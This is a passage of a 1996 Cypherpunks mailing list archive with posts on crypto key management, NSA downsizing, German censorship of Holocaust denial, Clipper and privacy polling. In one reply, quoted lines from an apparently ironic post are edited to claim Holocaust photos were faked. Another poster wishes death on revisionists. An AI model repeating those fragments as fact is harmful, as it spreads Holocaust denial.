data sets from a given encrypted message; I am simply suggesting a potential
mechanism).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 29 Jan 1996 06:34:54 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Microsoft's CryptoAPI - thoughts?
In-Reply-To: <199601281436.GAA22473@mailx.best.com>
Message-ID: <199601282214.RAA03080@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James Donald writes:
> I was concerned about a different issue:
> 
> Suppose you have some signed information:  You wish to send some encrypted
> information to the person who wrote that signed information.
> 
> If the signing key and the encrypting key are the same, your software can
> locally ensure that you encrypt with the right key, (The correct key is the
> same public key that you used to check the signature on the message.)
> 
> If the signing key and the encrypting key are different, then in order to
> ensure that you are not spoofed into using the wrong public key, the
> whole protocol must work correctly, exposing many more points of attack, 
> since key management is the most complex and most vulnerable area.

OK, I think I understand the concern. I was assuming a model where the 
signing and encrypting keys are bound together in a certificate in some 
fashion. Presumably the encrypting key is signed by the signing key. The
certificates are distributed & managed according to some protocols and 
policies that are orthogonal to the number of keys in a single certificate.

Things get slightly more complicated if you want to update the encrypting and
signing keys independently of each other. But offhand I don't see any new
thorny issues arising.

Disclaimer: I haven't read enough of the MSCAPI to have any idea how it 
proposes to handle the purpose-specific keys. 

Futplex <futplex@pseudonym.com>		GO COWBOYS!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQv1IynaAKQPVHDZAQFawwf7BySS8rC/uugXjOtgBM/GU4VlQfdXSk9p
XjaGP1fJiBeFxwtiJe26MqoPmqSNrvV3Bf/iVawUiB1mU+NQgcX6mf6kf7P05c2c
JMsYzFaT468VDC7/uv2pc8NT0u70bbWW8lrSqmyFGBVvMnYDmHXN7XWywdMuB3mk
BIG+zrcfFRVlrHkIGvz3Xzuaog3SVRCUxujozxw1vciY4EgRN2vvizuecNAa4R0j
//vVNOiEAAPqAb/ZEG29Fc/LR7ecjcIihNA+pB/Dn9e5yyuX1H6yy4HNRn0RGaSx
/lDIsLXYI3KsMWuiYENaR5aNcXzn68aM7IxOCEHjp59kLEAy8KxbJQ==
=o0QD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jan 1996 08:32:22 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: [NOISE] Re: The Big Lie
Message-ID: <ad314e1b1a0210043493@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:54 PM 1/28/96, John F. Fricker wrote:
>My grandfather was drafted towards the end of world war ii. he was a
>doctor and was among the first medical teams to land at anzio. his
>hospital was the first to arrive at auswitz <sp?>. When asked how that
>affected him, my grandmother said "After he returned from the war there
>was no joy left in him."
>
>I do not doubt the existance of prison camps in the third reich. Whether
>the stories have been exaggerated is another question. Besides in this day
>and age where Isreal is a nuclear arsenal run by nutty rightwing warlords
>who in their right mind would dare belittle their tragedies.
.....

You need to read a wider variety of articles, and gain an understanding of
irony used to make a point. I sometimes despair when I get these comments.
(The ones I get in private mail often reveal incurable cluelessness, even
if the correspondents are just high school students who somehow found the
CP list.)

To make it clear to those readers out there who take all posts as literal
(and who didn't read my note at the bottom!), I was not doubting that Jews
were exterminated.

Also, John, you need not quote my entire article at the end of your own
comments. Use your editor to quote only the parts you wish to discuss.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jan 1996 08:37:45 +0800
To: cypherpunks@toad.com
Subject: The Dangers of Cross-Pollinating Other Mailing Lists
Message-ID: <ad3150051c021004a7d9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Folks,

When people decide to copy other mailing lists on messages they send to
Cypherpunks (or vice versa), we often get flooded with insults and spams
from people who don't share our views. (While I have nothing against trying
to recruit others to our views, in my opinion this is best done by
judicious writing of essays for _them_, tuned to their interests, and not
in mindless spamming of every list that might have a passing interest in
some of the topics.)

We already have enough traffic here, and don't need replies from a bunch of
other lists, be they libertarian lists, digital commerce lists, human
rights lists, or java lists.

The latest example of this is the rantfest invvolving these players:

------
From: Jack Hammer <jh@teleport.com>
To: jim bell <jimbell@pacifier.com>
Cc: Rich Graves <llurch@networking.stanford.edu>, cypherpunks@toad.com,
        nwlibertarians@teleport.com, hammernet-l@teleport.com,
        libernet-d@dartmouth.EDU, liberty-and-justice@pobox.com
------

I recognized Bell and Graves, but not the others. And I see no reason why
our list should be dragged into flames about "fart sacks" by people on all
of these other lists.

This was the final straw, and I have no choice except to add Bell, Graves,
Hammer, etc. to my filter list, which I will now proceed to do before
sending this message off.

[Done]

Words have consequences. So do flames.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Felix Lee <flee@teleport.com>
Date: Mon, 29 Jan 1996 10:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <310c0c26.30666226@smtp.ix.netcom.com>
Message-ID: <199601290147.RAA19217@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


> Are you saying that, if I ran a bookstore, and accepted international
> mail orders, I would have to screen every order to ensure I did not
> ship something offensive to the German government?

urrr.  yes?  anyone doing international shipping has to comply with
customs regulations anyway.  this isn't really any different.  (except
when telecom or broadcast media become involved.)

(excuse me while I see if I can ship smallpox to germany.)
--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Jan 1996 07:31:35 +0800
To: tcmay@got.net
Subject: Re: Downsizing the NSA
Message-ID: <01I0JWHQ1038A0UMAT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 28-JAN-1996 03:47:14.08

>However, as Phill notes, the NSA and other intelligence agencies are now in
that most dangerous of positions: a powerful agency or department casting
about for something to do.

Spying on citizens and keeping the keys to their private communications and
diaries is not an appropriate option.

AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
just do the right thing: admit that the Soviet threat is no more,
congratulate the victors, and downsize by 20,000 employees?
-------------------
	Funny, everyone seems to forget about China. If I were dictating NSA
policies, I'd simply reassign the people to China. Admittedly, modern
cryptography makes some of it useless, but HUMINT to get (parts of) codes
is still quite possible.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@nic.ai>
Date: Mon, 29 Jan 1996 10:35:00 +0800
To: lull@acm.org (John Lull)
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <310c0c26.30666226@smtp.ix.netcom.com>
Message-ID: <199601290208.SAA07288@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Are you saying that, if I ran a bookstore, and accepted international
> mail orders, I would have to screen every order to ensure I did not
> ship something offensive to the German government?  And if I did fill
> such an order, and without ever having set foot in Germany, I could be
> arrested on my next trip to Europe, extradited to Germany, and
> imprisoned for doing something that is constitutionally protected in
> the US?

	When I worked for Walnut Creek CDROM they had to remove
"Castle Wolfenstein" from one of their CDs because they wouldn't have
been able to ship to Germany if they didn't.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Jan 1996 07:34:52 +0800
To: frissell@panix.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <01I0JX3QC4NAA0UMAT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frissell@panix.com"  "Duncan Frissell" 28-JAN-1996 07:06:37.29

>At 12:07 AM 1/28/96 -0800, Timothy C. May wrote:

>* the Germans recently arrested an American who landed in Germany
>somewhere, as part of a trip. It seems he had been involved with the
>production of Neo-Nazi material, somewhere out west. This was the last I
>heard about the story. Sorry, I'm going from carbon-based memory.

He was grabbed in Denmark and extradited to Germany so you'd have to avoid
most of the EU.  
-------------------
	One wonders if this would happen to an ISP who carried Neo-Nazi
material and happened to travel to some part of the EU. Or would other
countries than Germany have a bit more sense?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 29 Jan 1996 08:11:34 +0800
To: mpd@netcom.com
Subject: Re: The Big Lie
Message-ID: <01I0JXH66UC8A0UMAT@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > [Note: I present this as a line of thinking that is
 > actually often the result of suppression of views. "If They
 > are suppressing it, maybe there's some truth to it." Note
 > also that the views of Zundel and other Holocaust Deniers
 > are not causally related to the deaths of millions of Jews,
 > gypsies, and others in WW II. The damage, if any, is in the
 > "hurt feelings" and "insults" felt by survivors and their
 > relatives.

	While survivors and their relatives are certainly the most hurt by
such, I would like to mention that the insults in question also include those
who allegely lied about the camps. My grandfather (Ltc. (Ret.) William H.
Smith) was directly behind the front lines in his Army Intelligence work
(document gathering and sorting at that point). He and his sergeant were the
first Allied discoverers of one of the camps- I believe Dachau. Moreover, he
was in charge of the Paris Documents Center at one point. I don't like his
being called a liar.
	Despite that, I still regard Holocaust Revisionists as having free
speech rights. It's just if they try to recreate Krystallnacht (sp?) that I
want them dead.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Tue, 30 Jan 1996 08:12:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Denning's misleading statements
In-Reply-To: <ad2ff0ab010210043115@[205.199.118.202]>
Message-ID: <9601281916.aa01048@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> Tim May wrote:
> 
> I've never met Dorothy Denning, so I hesitate to characterize her as a
> villainess. But certainly she's the only noted cryptographer I know of
> who's gone so far out on a limb to defend a position the vast majority of
> computer scientists, civil libertarians, and cryptographers scoff at. (And
> I don't just mean it is we libertarians and civil libertarians who are
> scoffing, I mean that nearly every noted expert who has carefully reviewed
> the various schemes to control crypto and to provide GAK has found them to
> be essentially unenforceable except via draconian police state methods, and
> maybe not even then.)
> 
> I personally believe her estrangement from the mainstream position these
> last several years and her apparent close association with the
> inside-the-Beltway crowd has actually skewed her judgment, that she is no
> longer evaluating policies and capabilities based on reasonable objective,
> academic analysis.

Having met Dr. Denning, and watched her presentation of the Escrowed
Encryption Standard, (for the novice), I can concur with your analysis.
She presented  a very limited, safe, simple clipper chip, which  would do
nothing more than give the FBI an analogous wire tap to gather information 
on terrorists, pedophiles, and organized criminals such as drug dealers.

The limitations of her argument were quickly ripped to shreds by Phil
Zimmerman, who painted a much more expansive world view canvas for the
audience.  Denning was visibly shaking as we talked after the session.
The NSA group think she was armed with didn't provide her the tools to
deal with the reality she found herself in.

> Her views, and even many of her examples, are very close the views and
> examples used by FBI Director Louis Freeh in his testimony to Congress a
> few years ago. (I scanned and OCRed this testimony as a favor to Whit
> Diffie, so in reviewing the text for OCR corrections, I became very
> familiar with Freeh's fear-inducing testimony.)

Your participation in the A&E Voyager segment presented much food for thought.
We are becoming the "Bad Guys" in a well orchestrated Psy Ops campaign
propagated naively by the 4th Estate.  Robust cryptography and online
anonymity are portrayed as the tools of various "Boogie Men" the US Gov't
is obliged to protect  its unsuspecting civilians from.

Its up to us to find them specifically lying and cheating, and expose that
information to public scrutiny.  30 years ago the 4th Estate had a field
day hyping the LSD Chromosome Break *Hoax*.  Van Sim, of the Edgewood Arsenal
was unable to replicate the research, but his findings were suppressed by the
US Army by virtue of a long standing liaison between the CIA and the 
research and development staff at Edgewood.

Denning announced the  Clipper scheme secure, and Blaze hacked it shortly
there after.  She parrots the NSA party line, and there is a well established
link of conflict of interest negating any academic objectivity she might
profess.  Those of you who've come in personal contact with NSA cryptographers
can attest to their collective arrogance.  They consider themselves an
exclusive elite, above trivial civil liberties issues.  
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Mon, 29 Jan 1996 08:55:35 +0800
To: tcmay@got.net
Subject: Re: The Big Lie
Message-ID: <9601290026.AA02692@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Hey Tim-
Just a thought.  When you stated that other countries might be trying to 
(basically) pretend the holocaust had never happened, because it might NOT 
have happened and may very well be a big lie, you forgot to consider somthing. 
 Had the holocaut happened, which i believe it did, it was of such horific 
magnitude that, since (for a time) we sat back and let it happen, let 6 
million innocent people die, we might be trying to forget about it so as to 
not have to take responsibility for it having happened.  It is much easier to 
say that it never existed and have no responsibility, than to acknoledge that 
it happened, and to look at what kind of people it makes us to let it happen.

Just a thought. :)

Dan
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 29 Jan 1996 08:59:23 +0800
To: cypherpunks@toad.com
Subject: Opinion piece in NYT; responses needed
Message-ID: <ad31794b06021004bf8a@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


>   The New York Times, January 2, 1996, Business, p. 14
>
>
>   Viewpoint: J. Walker Smith
>
>   Standoff in Cyberspace Gulch
>
>
>   In the new frontier that is cyberspace, a showdown is
>   shaping up as the law moves into town. On one side is a
>   band of cybercitizens bent on protecting their privacy as
>   they explore this unmapped territory. On the other are the
>   lawmakers charged with safeguarding all cybercitizens from
>   crime, even if it means forcing them to give up some of
>   their privacy by, say, signing in as they enter town.
>
>   This is how the public debate over cyberspace security has
>   been framed. And on-line users are, indeed, worried about
>   security. Yankelovich Partners surveyed 400 randomly
>   selected on-line users, aged 16 and older, by telephone in
>   mid-October and found that 90 percent agree that better
>   Internet security is needed to insure that personal and
>   financial information is not accessible to unauthorized
>   people. Nearly 80 percent believe it is too easy for one's
>   credit card number to be stolen if used on the Internet.
>   And almost 70 percent agree that pornography on the
>   Internet has gone far beyond reasonable bounds.

This op-ed starts out by portraying the two 'sides' as 'lawmakers
safeguarding from crime", and "citizens bent on protecting privacy"--which
I'd say is fairly accurate.  The next paragraph, however, discusses the
fact that almost everyone agrees that 'better internet security ' is
neccesary is support for the lawmakers side of things. It goes on to say:

[...]
>   A cyberspace that offered privacy, security and decency
>   would clearly be preferred. But recognizing that this
>   simply may not be technologically achievable, most on-line
>   users put security and decency ahead of absolute privacy.
>   Fifty-three percent of cybercitizens agree that
>   guaranteeing Internet security is more important than
>   worrying about the privacy of each user.

The rest of the opinion piece only gets worse--the author thinks that,
while privacy is a good goal,  "in no way should [privacy] distract
regulators from maintaining order and decency on this new frontier, nor
should it be allowed to defeat the progress of commercial ventures. "

Now, first of all, the cypherpunks are clearly an entity that values _both_
privacy and security, and doesn't see them as at all contradictory.
They're two sides of the crypto coin.  The very same encryption that can
make it possible to set up secure credit card transactions also makes it
possible to use anonymous remailers--and the security isn't harmed by
people with anonymous shell accounts or access to the net.  Chaum's
digicash could theoretically provide security _and_ anonymity, without any
contradiction.

Now, Walter Smith probably wouldn't be satisified with cypherpunkian
solutions--he doesn't want anonymous communications _regardless_ of whether
we also get secure credit card transactions, and would be perfeclty happy
with crypto available to everyone, and a law against anonymous
communications on the net.  But, regardless of his own opinion of
privacy/anonymity and security individually, in this piece he portrays them
as linked, and in fact mutually damaging.  There is a danger of this view
becomming commonplace--whenever we encounter it, we should take pains to
argue that privacy/anonymity and security _aren't_ mutually exclusive, are
sometimes mutually _enhancing_  (ITAR restrictions make anon remailers and
secure financial transactions a pain in the ass to set up legally).  And we
should make it clear that there are a lot of people out there who value
both extremely highly, and don't see any need to sacrifice one for the
other.  [I'm not sure of the proper email address to send a response to
this viewpoint, but you might try "viewpts@nytimes.com", which is the
proper place to submit "viewpoints", ie op-ed pieces in Business section of
the NYT].

Very interesting also, is that Smith explicitly says that privacy concerns
shouldn't be allowed to "defeat the progress of commercial ventures".
It's unclear exactly what the 'progress' that Smith is talking about is,
that would be defeated by putting too much emphasis on privacy.  But the
previous paragraph mentions "users will find it in their self-interest to
reveal more and more about themselves so the interactive system can cater
easily to their needs and preferences.... 71 percent of respondents found
it highly desirable to be able to receive customized information, while
only 35 percent felt the same about a guarantee of anonymity."  Smith
appears to be saying that the interests of commercial ventures in ammassing
data about what consumers visited what web sites, and what consumers are
likely targets of customized marketting (customized information?), should
take precedence over the interests of citizens in keeping their information
private!

Many on cypherpunks are used to thinking of business interests as if they
match cypherpunks interests, I think--certainly they seem to where ITAR is
concerned, at the moment.  But it's good to remember that
'business interests', at least as interpreted by some businesses, are going
to contradict cypherpunks interets.  Unfortunately, business interests
often seem to have the advantage in the U.S. legislative process--with this
in mind, lobbying action from 'public interest' groups like the EFF, and us
as individuals, is more important when it doesn't line up with business
interests (protecting anonymity) then when it does (getting rid of ITAR).
Large corporations are lobbying for loosening ITAR, and we can help them,
but when lobbying for allowing anonmity, if it comes down to that, we'll
have fewer/less powerful allies.

Also, clearly in this survey, they asked two independent questions "Do you
find it desirable to be able to receieve customized information" (71% said
yes), "do you find it desirable to be able to guarantee anonymity" (35%
yes, which is actually enhearteningly higher then I would have thought).
In the context of his opinion piece, though, he clearly sets them up
against each other--what if the surveyed had been asked "When guaranteeing
anonymity comes into conflict with allowing commercial ventures to send you
customized adverts, which is more important"?  Obviously, that question is
biased also, but my point is that it's important to make this connection in
people's minds.      Here, there might _be_ a tradeoff--and consumers
frequently get up in arms about how anyone can get their credit report, or
their driving record, or whatever.  It's important that we create a
connection between anonmity on the net, and empowerment to keep personal
information personal--we need to link the "customized information" which
Smith's surveyees were so enamored of, to the privacy invasions posed by
credit reports and such, that consumers already know about and know they
don't like.

[I'm going to try to make myself write a letter to the NYT in response to
that viewpoint, making some of these points I'm saying it's important to
make, but you should too. :)  ]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jan 1996 10:46:04 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <ad316db21e021004a0ff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:10 AM 1/29/96, John Lull wrote:

>Are you saying that, if I ran a bookstore, and accepted international
>mail orders, I would have to screen every order to ensure I did not
>ship something offensive to the German government?  And if I did fill
>such an order, and without ever having set foot in Germany, I could be
>arrested on my next trip to Europe, extradited to Germany, and
>imprisoned for doing something that is constitutionally protected in
>the US?

As a point of information, the operators of the "Amateur Action" bulletin
board in Fremont, California are now sitting in prison because they
e-mailed material fully legal in California but illegal (the court
determined) in Memphis, Tennessee.

And, yes, there are many things which are "constitutionally protected"
inside the U.S. but which are crimes in Europe and elsewhere. (And things
that are legal in Europe, but illegal in the U.S., and all permutations.)
One can write a book in the U.S. and receive a death sentence in Iran.

Get used to it. It makes no sense for us to whine and complain about
Country A outlawing some activity that is legal in Country B.

The thing for us to do is to use technology and code to subvert and bypass
laws of any country which are repressive and controlling.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 29 Jan 1996 09:12:05 +0800
To: cypherpunks@toad.com
Subject: Opinion piece in NYT; responses needed
Message-ID: <199601290057.TAA21083@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by jrochkin@cs.oberlin.edu (Jonathan 
Rochkind) on Sun, 28 Jan  7:33 PM

>   The New York Times, January 2, 1996, Business, p. 14
>   Viewpoint: J. Walker Smith
>   Standoff in Cyberspace Gulch


That's January 28, 1996, no lie. Mein typo, bitte schoen.


Back to Mr. Rochkind's assail.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 30 Jan 1996 08:12:29 +0800
To: drose@AZStarNet.com
Subject: Re: The Big Lie
In-Reply-To: <199601290354.UAA15417@web.azstarnet.com>
Message-ID: <199601290407.UAA24691@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


drose@AZStarNet.com writes:
> 
> Timothy C. May wrote (with some judicious editing):
> 
> , I took it as a fact that the
> >so-called Holocaust actually happened. I saw pictures of death camps,
> >interviews with survivors, etc.
> >
> > It seems more likely that
> >the pictures were faked, 
> >
> >, I suspect the
> >stories are true that the Holocaust was part of Truman's "Big Lie."
> >
> 
> Good Lord!  We've all enjoyed Tim's rants, but this takes the biscuit.
> What's next?
> A denial of the athletic abilities of Negroes?


What's next is an expose on the conspiracy
between the NSA, Hillary Clinton and the Hamburgurler(R) to destroy
the ability of otherwise intelligent Americans to recognize sarcasm.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 31 Jan 1996 00:43:31 +0800
To: cypherpunks@toad.com
Subject: Re: Downsizing the NSA
In-Reply-To: <01I0JWHQ1038A0UMAT@mbcl.rutgers.edu>
Message-ID: <LTyFiD76w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu> writes:
> AT&T is downsizing, IBM downsized a while back, so why couldn't the NSA
> just do the right thing: admit that the Soviet threat is no more,
> congratulate the victors, and downsize by 20,000 employees?

I went to a talk by Andy Koenig a few weeks ago and he claimed that even
though AT&T is laying off people (and splitting) they're still hiring every
internet/security person they could find.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 29 Jan 1996 10:54:48 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: The Big Lie
In-Reply-To: <ad314e1b1a0210043493@[205.199.118.202]>
Message-ID: <B4yFiD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


This has no cryptographic relevance whatsoever, but...

tcmay@got.net (Timothy C. May) writes:
> You need to read a wider variety of articles, and gain an understanding of
> irony used to make a point. I sometimes despair when I get these comments.
> (The ones I get in private mail often reveal incurable cluelessness, even
> if the correspondents are just high school students who somehow found the
> CP list.)
>
> To make it clear to those readers out there who take all posts as literal
> (and who didn't read my note at the bottom!), I was not doubting that Jews
> were exterminated.

I went to high school in the U.S. (a very unpleasant experience), and we were
more-or-less taught that:

a) Only Jews were killed in the Nazi death camps;
 (actually, Nazis targeted many other groups for extermination, and about
 half the people put to death in the camps weren't Jews.)
b) Nazis made soap/lampshades/mattresses from the fat/skin/hair of their
 victims on industrial scale;
c) Nazis primary goal in conquering the world was to round up and kill all
 the Jews;
d) The U.S. entered the war and defeated Germany almost single-handedly in
 order to save the Jews.

I can very well imagine how a typical American taught to believe the above can
come across a "revisionist" material like _While 6 Million Died_ by Arthur D.
Morse; or hear about Russia's role in defeating the Nazis; and begin to doubt
whether any Jews were murdered at all. That's not good.

I guess this bears some relevance to the subject of credibility.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Tue, 30 Jan 1996 03:57:56 +0800
To: cypherpunks@toad.com
Subject: Re: The Unintended Consequences of Suppression
Message-ID: <2.2.32.19960129042557.0069b468@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:52 PM 1/28/96 -0600, Alex Strasheim <cp@proust.suba.com> wrote:
>>     You just don't get it, do you?  Do-gooders like the Wiesenthalistas 
>> don't need to be *right*; they need *a steady stream of cash contributions*
>
>It's usually more effective to point out why what someone is saying is
>wrong rather than to speculate as to what their motives for saying it
>might be.

Particularly in cases where, rightly or wrongly, the folks being subjected
to ad hominem have a very favorable public image.

Explanations that give credit for good intentions and show how the present
action works to undermine them, and which include constructive alternatives,
are a _lot_ more likely to be listened to.

At least that's the way it works for me. And it works for pretty much
everyone I know. If there's anyone here who's more impressed by ad hominem,
I'd be curious, but they'd still be in the minority.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 29 Jan 1996 11:08:30 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <2.2.32.19960128144005.00690390@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 04:02 PM 01/28/96 -0600, m5@dev.tivoli.com (Mike McNally) wrote:
>
>olmur@dwarf.bb.bawue.de writes:
> > It's illegal in Germany to publish material denying the holocaust.  In
> > the same moment this guy sent his book [...] per snail-mail from Canada
> > to Germany he commited a crime here in Germany.
>
>Hi.  President M5 of Psychonia here.  I'm afraid we've recently
>enacted legislation in the tiny nation of Psychonia that makes it
>illegal to parenthesize question marks in electronic mail messages,
>because such acts are a direct offense to some of the members of
>primitive hill tribes who live in remote portions of our land.
>
>I issue this warning not to set foot in Psychonia or any of the
>countries with whom we share extradition treaties, or you will be
>arrested and brought here for trial, conviction, and punishment.
>

This message is _clearly_ an effort to spread *pornography* on the net. I know this to be true through the use of a 3-letter code that I have cleverly deleted . If you continue to spread this vile and disgusting trash, I shall have no choice but to complain to my government representatives and have all imports from your country banned, and to pressure companies not to do business in/with your nation.

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQtudMVrTvyYOzAZAQEJlAP/WeH2TkFaa0MBz2AfWsbOU30flSmghqCn
Hg30Uwi44fHg4zpGsQYPfwPofK5BJ+cwPcTBuhurZgmKxhEJuj5OrrOw/kaKLjnu
uJ82MEIEhkojCUGAQicYgW+B2g62vtJXYhBuQWTKzrKpiys2vYucil6m/8fxZFKx
TDSq4sHK5IA=
=MtgG
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 29 Jan 1996 10:06:47 +0800
To: "Roy M. Silvernail" <roy@sendai.cybrspc.mn.org>
Subject: Re: Escrowing Viewing and Reading Habits with the Government
In-Reply-To: <960128.102805.1b2.rnr.w165w@sendai.cybrspc.mn.org>
Message-ID: <Pine.SV4.3.91.960128201108.12961A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> > The "Library Awareness Program," administered by the Justice Department, is
> > designed to identify potential criminals before they have a chance to
> > commit their deeds. The visits to libraries made by the FBI are used to
> > determine who is reading subversive or dangerous material.

Do you really think the FBI believes that asking librarians to keep 
records of customer useage is an efficient way to read the customers minds?
Do you really think that the FBI foreign counter-intelligence squad has 
nothing better to do than keep a database of who is reading Che Guevara 
memoirs?

   When someone is being obtained as an asset by an intelligence
organization, they are very very carefully led down a path of increasingly
serious crimes that they are directed to commit (in return for the sex or
the paying off of their debts, which are the two standard hooks) by the
controller ("foreign spy"). The first event is something quite minor. The
aim is, from the very beginning, to put the asset into a compromised
